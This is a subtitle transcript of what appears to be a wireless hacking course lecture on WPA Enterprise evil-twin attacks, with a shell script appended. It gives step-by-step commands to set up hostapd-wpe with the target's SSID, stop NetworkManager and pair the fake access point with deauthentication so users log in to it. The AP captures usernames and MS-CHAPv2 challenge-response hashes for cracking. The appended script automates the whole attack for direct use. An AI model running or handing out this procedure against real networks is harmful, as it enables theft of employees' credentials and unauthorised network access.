1 00:00:01,200 --> 00:00:09,140 Okay, now that we know the methods that we can use to gain access to WPA Enterprise networks, in this
2 00:00:09,140 --> 00:00:17,170 lecture I want to show you the more advanced method, the one where we create a fake WPA Enterprise network.
3 00:00:17,610 --> 00:00:19,170 So the first method,
4 00:00:19,290 --> 00:00:22,570 like I said, just uses a traditional fake access point.
5 00:00:22,680 --> 00:00:30,330 And I covered this before in detail. I covered each aspect of this attack in detail so that
6 00:00:30,330 --> 00:00:32,330 you can adapt it to any scenario.
7 00:00:32,550 --> 00:00:38,070 And this is a perfect example where you can't use tools like Fluxion and Wifiphisher and you'll have
8 00:00:38,070 --> 00:00:39,150 to do it manually.
9 00:00:39,270 --> 00:00:41,880 And I covered how to do it manually before.
10 00:00:41,880 --> 00:00:46,610 That's why I'm going to be covering the more advanced method in this lecture.
11 00:00:47,070 --> 00:00:53,910 So I'm going to go to Kali, and the first thing that I'm going to do is I'll need to install a modified
12 00:00:53,910 --> 00:00:56,460 version of hostapd.
13 00:00:56,460 --> 00:01:01,010 So we used to use hostapd to generate the normal fake access point.
14 00:01:01,020 --> 00:01:10,020 Now there is a modified version called hostapd-wpe, and that version of hostapd is designed to run
15 00:01:10,110 --> 00:01:15,500 a fake access point with WPA Enterprise with a FreeRADIUS server.
16 00:01:16,020 --> 00:01:22,990 So first of all I'm going to have to update my sources, so I'm going to do apt-get update. Now that my
17 00:01:22,990 --> 00:01:24,120 sources are updated,
18 00:01:24,130 --> 00:01:30,640 I'm going to do apt-get install followed by the program that I want to install, which is called
19 00:01:30,650 --> 00:01:33,680 hostapd-wpe.
20 00:01:33,910 --> 00:01:36,140 So we always use apt-get.
21 00:01:36,250 --> 00:01:43,320 We're just telling it to install, and the package name or the program name is hostapd-wpe.
22 00:01:43,510 --> 00:01:49,900 I'm going to hit enter, and that will automatically download the program and all the needed packages and
23 00:01:49,900 --> 00:01:51,290 configure it for me.
24 00:01:53,480 --> 00:01:55,500 OK, now that's all done.
25 00:01:55,520 --> 00:01:56,970 So I'm going to clear the screen.
26 00:01:58,600 --> 00:02:04,130 And the next thing that we want to do is very similar to what we used to do with hostapd.
27 00:02:04,180 --> 00:02:11,030 We want to modify its configuration. So to do that we're going to do leafpad, which is my text editor,
28 00:02:11,730 --> 00:02:22,300 and I'm going to put the location of the configuration file, and that's stored in /etc/hostapd-wpe and
29 00:02:22,330 --> 00:02:25,810 again hostapd-wpe.conf.
30 00:02:27,870 --> 00:02:34,140 So we're doing leafpad, which is our text editor, and then we're giving it the location of the configuration
31 00:02:34,140 --> 00:02:35,440 file for
32 00:02:35,440 --> 00:02:37,470 hostapd-wpe.
33 00:02:37,830 --> 00:02:43,760 I'm going to hit enter, and the main things that you want to make sure are set correctly are, first of
34 00:02:43,760 --> 00:02:45,040 all, the interface.
35 00:02:45,140 --> 00:02:47,100 This is your wireless adapter.
36 00:02:47,240 --> 00:02:50,090 So in my case it's actually called wlan0.
37 00:02:50,120 --> 00:02:54,440 If you don't know what it's called, you have to do ifconfig, as you should know by now, and then you can
38 00:02:54,440 --> 00:02:56,210 get the name of it.
39 00:02:56,330 --> 00:03:00,100 The next thing that I want to modify is the SSID.
40 00:03:00,170 --> 00:03:09,590 This is the name of the fake access point, and it's set by default to be called hostapd-wpe.
41 00:03:09,620 --> 00:03:13,250 Now my target is called company network.
42 00:03:13,370 --> 00:03:19,400 So I'm going to call this company network as well, because as you know this is an evil twin attack.
43 00:03:19,430 --> 00:03:25,390 So you want your fake access point to have the exact same name as the target access point.
44 00:03:25,620 --> 00:03:33,090 So I'll call it company network. You can also modify the channel in here if you want, but I'm going to
45 00:03:33,090 --> 00:03:35,070 keep that the same.
46 00:03:35,070 --> 00:03:39,000 And I'm actually going to leave everything else here the same.
47 00:03:39,000 --> 00:03:43,300 Now if you scroll down you'll actually see, after this point, it says,
48 00:03:43,500 --> 00:03:49,350 and it says it here in the comment, everything that comes after here is literally just the normal
49 00:03:49,380 --> 00:03:51,570 hostapd configuration.
50 00:03:51,570 --> 00:03:58,870 So like I said, this is just a modified version of hostapd, which is modified so that it can use WPA
51 00:03:58,870 --> 00:04:02,350 Enterprise with a FreeRADIUS server.
52 00:04:03,000 --> 00:04:05,940 So I'm going to save this, Ctrl+S, and quit it,
53 00:04:05,940 --> 00:04:06,480 Ctrl+
54 00:04:06,480 --> 00:04:08,300 Q. OK.
55 00:04:08,400 --> 00:04:09,510 Now we're done.
56 00:04:09,600 --> 00:04:11,220 We're ready to run the attack.
57 00:04:11,400 --> 00:04:18,240 But before we do that, like we did with hostapd, we have to stop the network manager, because it's managing
58 00:04:18,240 --> 00:04:19,640 my wireless interface,
59 00:04:19,770 --> 00:04:24,650 and if it stays running it won't let me use it to create a fake access point.
60 00:04:25,050 --> 00:04:33,520 So I'm going to do service network-manager stop. This will stop the network manager for me.
61 00:04:33,700 --> 00:04:40,330 And now I can run the fake access point with WPA Enterprise. To do that,
62 00:04:40,330 --> 00:04:50,620 we're going to do hostapd-wpe followed by the location of the configuration file, which is in /etc/hostapd-wpe/
63 00:04:50,680 --> 00:04:56,860 hostapd-wpe.conf.
64 00:04:57,340 --> 00:05:02,230 So this command is actually very similar to the hostapd command that we used to use.
65 00:05:02,290 --> 00:05:08,350 You just put the name of the tool followed by the location of the configuration file.
66 00:05:08,380 --> 00:05:15,970 I'm going to hit enter, and as you can see right now it's telling me that the network is working; it's
67 00:05:15,990 --> 00:05:18,790 broadcasting under the name company network.
68 00:05:18,960 --> 00:05:26,760 And now you can just go ahead and run the deauthentication attack as I showed you before. You can deauthenticate
69 00:05:26,820 --> 00:05:28,360 all clients or some clients.
70 00:05:28,350 --> 00:05:34,200 Again, as shown before, clients will not be able to access their network; they won't be able to use the
71 00:05:34,200 --> 00:05:34,840 network.
72 00:05:35,070 --> 00:05:39,550 So they'll think, oh, maybe I can just connect to the other company network.
73 00:05:39,870 --> 00:05:44,690 So let's go to a Windows machine and see what we have.
74 00:05:47,080 --> 00:05:49,400 So I have my company network in here.
75 00:05:49,780 --> 00:05:51,060 I'm going to connect to it.
76 00:05:53,910 --> 00:06:02,400 And I'm going to put my username as zayd and my password as one two three four a b c d.
77 00:06:02,600 --> 00:06:05,120 I'm going to connect.
78 00:06:05,300 --> 00:06:10,480 Now this is just a warning saying that if you expect to see this network then connect to it,
79 00:06:10,520 --> 00:06:11,870 otherwise don't.
80 00:06:12,110 --> 00:06:19,670 Most people would just connect to it, because like I said, WPA Enterprise is usually used in large organizations.
81 00:06:19,760 --> 00:06:25,520 So people are used to seeing a number of routers and connecting to a number of routers, and if you run
82 00:06:25,580 --> 00:06:30,290 the deauthentication attack and they can't connect to their own router, then there is a very high chance
83 00:06:30,290 --> 00:06:35,870 of them trying to connect to the other router, or the other access point that has the exact
84 00:06:35,870 --> 00:06:38,470 same name that they're used to.
85 00:06:38,480 --> 00:06:45,310 Therefore I'm going to click on Connect. Now it's saying it can't connect to this network because I actually
86 00:06:45,310 --> 00:06:47,530 used the wrong username and password anyway.
87 00:06:47,800 --> 00:06:55,270 But if we go to the Kali machine you'll see that we captured the username, we captured the challenge
88 00:06:55,600 --> 00:06:58,240 and we captured the response.
89 00:06:58,240 --> 00:07:03,850 Now I know this is not the password that I put, so you still can't see one two three four a b c d, and
90 00:07:03,850 --> 00:07:06,300 that's because the password is encrypted.
91 00:07:06,610 --> 00:07:13,810 That's why I said the basic evil twin method that we showed before has an advantage over this method,
92 00:07:13,810 --> 00:07:19,000 because the password will be sent in plain text over HTTP.
93 00:07:19,060 --> 00:07:25,360 The problem with that method was the login screen wasn't very convincing. With this method
94 00:07:25,360 --> 00:07:32,580 you'll get a proper system login box, because we are implementing a proper WPA Enterprise network.
95 00:07:32,650 --> 00:07:34,680 So there's nothing fake about it.
96 00:07:34,690 --> 00:07:41,800 The only problem is, because this is a proper WPA Enterprise network, the password will be sent
97 00:07:41,800 --> 00:07:48,370 based on the authentication method used, which is a challenge-response method, where the router sends
98 00:07:48,430 --> 00:07:53,100 a challenge and then the client sends a response based on that.
99 00:07:53,410 --> 00:07:57,520 Now in the next section I'm going to talk more about this, and I'm going to show you how to crack the
100 00:07:57,520 --> 00:08:00,920 response and get the key for the network.
101 00:08:01,150 --> 00:08:03,530 But for now our attack is done.
102 00:08:03,580 --> 00:08:07,380 We managed to capture the username and the hash for that password.
103 00:08:07,570 --> 00:08:10,420 And in the next lecture I'm going to show you how to crack that password.
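The procedure the lecture walks through (edit the hostapd-wpe config, stop NetworkManager, start the fake access point), collected into one script as an added example. This is not the lecturer's own code and not part of hostapd-wpe; it assumes the shipped config lives at /etc/hostapd-wpe/hostapd-wpe.conf, that the adapter is wlan0 and the target SSID is "company network" (all overridable through the environment), and it only touches the three keys the lecture changes (interface, ssid, channel), leaving the EAP and certificate settings as shipped. The sample config embedded at the bottom is constructed for testing the edit helpers and is not the real file.

```shell
#!/bin/sh
# Added example, not the lecture's commands: prepare and launch a hostapd-wpe
# evil twin for a WPA Enterprise target. Assumptions (override via environment):
# config path, adapter name, target SSID and channel below.

CONF="${CONF:-/etc/hostapd-wpe/hostapd-wpe.conf}"
IFACE="${IFACE:-wlan0}"
TARGET_SSID="${TARGET_SSID:-company network}"
CHANNEL="${CHANNEL:-1}"

# get_key FILE KEY: print the current value of "KEY=" in FILE (first match).
get_key() {
    sed -n "s/^$2=//p" "$1" | head -n 1
}

# set_key FILE KEY VALUE: rewrite an existing "KEY=..." line, or append it if
# the key is absent. Goes through a temp file so it works with GNU and BSD sed.
set_key() {
    new=$(mktemp) || return 1
    if grep -q "^$2=" "$1"; then
        sed "s|^$2=.*|$2=$3|" "$1" > "$new"
    else
        cat "$1" > "$new" && printf '%s=%s\n' "$2" "$3" >> "$new"
    fi
    cat "$new" > "$1" && rm -f "$new"
}

# configure_evil_twin FILE IFACE SSID CHANNEL: the three edits made in the
# lecture. The SSID must match the target exactly, otherwise deauthenticated
# clients will not see the fake AP as "their" network. Everything else in the
# file (EAP server, certificate paths) is left as shipped.
configure_evil_twin() {
    set_key "$1" interface "$2" &&
    set_key "$1" ssid "$3" &&
    set_key "$1" channel "$4"
}

# run_attack: NetworkManager has to release the adapter before hostapd-wpe can
# put it into AP mode, exactly as with plain hostapd. hostapd-wpe then prints
# the username, challenge and response of every client that tries to log in.
run_attack() {
    service network-manager stop
    hostapd-wpe "$CONF"
}

# write_sample_config FILE: a constructed stand-in for the shipped config,
# holding only the keys this example reads or edits (not the real file).
write_sample_config() {
    cat > "$1" <<'EOF'
# constructed sample config, not the file shipped with hostapd-wpe
interface=wlan1
driver=nl80211
ssid=hostapd-wpe
hw_mode=g
channel=1
eap_server=1
ieee8021x=1
wpa=2
wpa_key_mgmt=WPA-EAP
EOF
}

# Only modify the live config and start the AP when explicitly asked:
#   sh evil_twin.sh run
if [ "${1:-}" = "run" ]; then
    configure_evil_twin "$CONF" "$IFACE" "$TARGET_SSID" "$CHANNEL" && run_attack
fi
```

Run it with the argument "run" as root on the Kali machine; without the argument it only defines the helpers, so it can be sourced and the edits checked with get_key before anything touches the adapter. Clients that accept the certificate prompt the lecture shows on Windows will then send their MS-CHAPv2 challenge and response, which hostapd-wpe prints on the console rather than the plaintext password.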